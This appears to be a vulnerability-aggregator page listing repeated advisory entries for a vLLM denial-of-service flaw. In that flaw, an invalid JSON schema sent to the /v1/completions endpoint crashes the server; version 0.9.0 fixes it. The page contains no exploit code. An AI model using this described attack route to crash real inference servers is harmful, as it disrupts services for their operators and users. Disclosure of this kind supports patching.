Количество 5
Количество 5
CVE-2025-48942
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
CVE-2025-48942
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
CVE-2025-48942
vLLM is an inference and serving engine for large language models (LLM ...
GHSA-6qc9-v4r8-22xg
vLLM DOS: Remotely kill vllm over http with invalid JSON schema
BDU:2025-11321
Уязвимость интерфейса v1/completions библиотеки для работы с большими языковыми моделями (LLM) vLLM, позволяющая нарушителю вызвать отказ в обслуживании
Уязвимостей на страницу
Уязвимость | CVSS | EPSS | Опубликовано | |
|---|---|---|---|---|
CVE-2025-48942 vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue. | CVSS3: 4.3 | 0% Низкий | 7 месяцев назад | |
CVE-2025-48942 vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue. | CVSS3: 6.5 | 0% Низкий | 7 месяцев назад | |
CVE-2025-48942 vLLM is an inference and serving engine for large language models (LLM ... | CVSS3: 6.5 | 0% Низкий | 7 месяцев назад | |
GHSA-6qc9-v4r8-22xg vLLM DOS: Remotely kill vllm over http with invalid JSON schema | CVSS3: 6.5 | 0% Низкий | 7 месяцев назад | |
BDU:2025-11321 Уязвимость интерфейса v1/completions библиотеки для работы с большими языковыми моделями (LLM) vLLM, позволяющая нарушителю вызвать отказ в обслуживании | CVSS3: 6.5 | 0% Низкий | 8 месяцев назад |
Уязвимостей на страницу